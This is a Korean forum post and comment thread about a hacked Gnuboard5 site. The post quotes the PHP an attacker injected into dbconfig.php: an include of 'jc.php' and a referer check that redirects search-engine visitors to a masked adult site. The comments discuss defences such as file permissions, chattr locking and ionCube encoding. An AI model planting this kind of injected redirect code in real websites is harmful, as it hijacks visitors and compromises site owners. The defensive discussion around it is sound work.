SIR
목록
이전글 다음글

그누보드5 해킹 후 dbconfig.php에 URL 납취를 하였네요 ㅎ

제윤아빠
프로필 보기이 회원 글보기이 회원의 댓글보기
 · 9년 전 · 4620 · 36

지속적인 업데이트를 않해줘서 그랬는지

/data 폴더에 접근하여 dbconfig.php를 수정하여

 

include("jc.php")

error_reporting(0);
$refer=$_SERVER['HTTP_REFERER'];
if(stristr($refer,"daum")||stristr($refer,"naver")||stristr($refer,"http")||stristr($refer,"google")||stristr($refer,"bing")||stristr($refer,"nate")||stristr($refer,"zum")||stristr($refer,"msn"))
{
header("location:http://g***.b*-***.com");
exit();
}

이런짓을 하고 갔네요

자꾸 음란 사이트로 들어가지길래 왜이러나 했디만...

큭 ㅠ 

|
글쓰기

댓글 36개

민쯩먼저깔게요
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
참고바랍니다~
http://sir.kr/cm_free/1378097
익명닉네임
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
참고로 너무 힘들면 data 폴더에 dbconfig.php 를 다른곳으로 옴기고 common.php 에서 dbconfig.php 확인 경로를 다른곳으로 옴기세요..ㅎㅎ 잼뜸 ..ㅇㅅㅇ.. 제 사이트 도 그런 경우가 있다보니 보안 펀션만 그누보드5 를 좀 쓰고 나머진 자체제작... ㅇㅅㅇ..
우성님
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@익명닉네임 와우 좋은 팁이네요
익명닉네임
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@우성님 굳이 dbconfig.php 를 data 폴더에 넣을 필요가 없죠.. 보안이 걱정되면.. common.php 만 탈취안되면 common.php 에서 dbconfig.php 경로를 다른곳으로 옴기고 data 폴더에 dbconfig.php 를 다른곳으로 옴기면 된다는.. ㅎㅎ
亞波治
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
어디서 어떻게 뚫렸는지 확인이 가능 한가요?
그누보드 자체에서 뚫린것인지 아님 다른경로로 뚫린것이지....

@익명닉네임 dbconfig.php,common.php 파일을 이동해 놓으면 뭐합니까?
뚤리면 다찾아서 수정하면 아무소용 없는것을.....ㅠㅠ
익명닉네임
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@亞波治 그거까진 저도..음... ?!
sinbi
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@익명닉네임 ㅋㅋㅋ
우성님
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@亞波治 data 폴더는 707이니 ㅎㅎ 다른 곳은 그나마 낫지않을까요 ㅎ
제윤아빠
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@亞波治 중국발 해킹으로 의심되네요...해커가 정해놓은 사이트 역시 성인 사이트를 가장한 금전 갈취를 목적으로 한것 같은데... 네이버에서 검색하면 TITLE 까지 수정을 해놓았더라구요 ;;;
편리
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
dbconfig.php 파일의 소유권을 변경해서 웹서버 쓰기권한만 없애도
파일이 변경되는 일은 없을 것 같은데요..
亞波治
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@편리 좋은 아이디어 입니다만, 호스팅 사용자는 소유권 변경을 못하지 않나요?
편리
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@亞波治 소유권 변경을 위한 php 파일을 생성해서 웹서버 권한으로 실행시키면 가능할 것 같은데요..
익명닉네임
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@편리 근데 data 폴더를 굳이 707 로 셋팅 안하고 755 로 해도 설치가 되는데
755 로 해도 해킹되는건가여?? 개인적으로 궁굼해서 물어봅니닷.
sinbi
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@익명닉네임 저번에 755 세팅해 본 적 있는데, 아미나 빌더 사용할 때 문제 있더라구요..
亞波治
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@편리 호스팅에 따라 안되는곳이 많을듯 싶네요....^^;;

쉘에서 chattr 를 쓸수 있으면 잠글수 있을텐데....

chattr +I dbconfig.php

이러면 볼수는 있어도 수정은 불가 할테니.....ㅋㅋ
sinbi
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@亞波治 아파치 님, 이 명령어로 잠근 건, 그럼 어케 다시 푸나요?
亞波治
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@sinbi chattr -i dbconfig.php 입니다.
잠겼는지 확인은 lsattr 하시면 잠겼을때 ----i-------- dbconfig.php 이렇게 출력 됩니다....^^
sinbi
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@亞波治 좋은 정보 감사합니다. ^^
ll2zeo
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
저 같은경우엔 dbconfig.php파일은 그냥 이온큐브로... 쿨럭;
sinbi
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@l2zeo ㅋㅋ 그게 가장 확실한 방법이겠네요.

근데, 이온큐브 가격이...ㅡㅡ;
얼마였죠? 20 ~ 30만 사이 아닌가요?
ll2zeo
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@sinbi 담배피는 아이 어디갔는지..ㅠㅠ..
블랙프라이데이때를 노려야 합니다 ㅎ
sinbi
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@l2zeo 그래서 얼마에? ^^;;
PS.
엘투제오 님 하면, 담배피는 아가 생각뿐인뎅..ㅋㅋ
ll2zeo
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@sinbi 지금 찾아보니 179달러에 구매했네요, 프로버전을요.
프로버전이 대략 45만원하는건데 저렴하게 구매했죠.

PHP Encoder Pro Edition 8 for Linux 179.00(USD)
sinbi
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@l2zeo 와...........어마어마하게 가격할인 구매하셨네요. 저도 한번 노려봐야겠네요.^^
sinbi
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@l2zeo 담배 피는 아가는 어째셨어요? ㅋ
亞波治
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@l2zeo 구입비용이 어마어마 하잖아요....ㅋㅋ
ll2zeo
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@亞波治 저도 구입가격때문에 망설이던찰나에 블랙프라이데이때 구매했었습니다 ^^ㅎ
亞波治
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@l2zeo 저도 블랙 프라이데이나 사이버 데이를 노려야 겠군요. 하나 질러 봐야겠는데 어디에다 쓰죠???
ll2zeo
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@亞波治 dbconfig.php 암호화할때요...ㅠㅠ
하호호
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
혹시 그누보드 버젼을 알수있나요?
스노든
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
ㅜㅜㅜ
제윤아빠
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
많은 분들이 이렇게 글들을 남겨주시니 +_+ 힘이 나네요
유창화
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
나는 그거보다
생성된 파일도 없고 변조된 파일도 없는데
메인 캐시의 도메인이 임의로 바뀌던데......
아직 이유는 못찾고 시간도 없고 해서
캐시 사용안함으로 바꿧습니다.

그것도 중국 사이트

그리고 물론, 최신 버전입니다.
ll2zeo
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@유창화 캐시사용안함이후로는 괜찮던가요??
유창화
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
@l2zeo 네 아직 괜찮은거 같습니다.
빨간망토의비밀
프로필 보기이 회원 글보기이 회원의 댓글보기
 9년 전
보안이라는게 끝이 없네요.
막는자와 뚫으려는자. ^^

댓글 작성

댓글을 작성하시려면 로그인이 필요합니다.

로그인하기
🐛 버그신고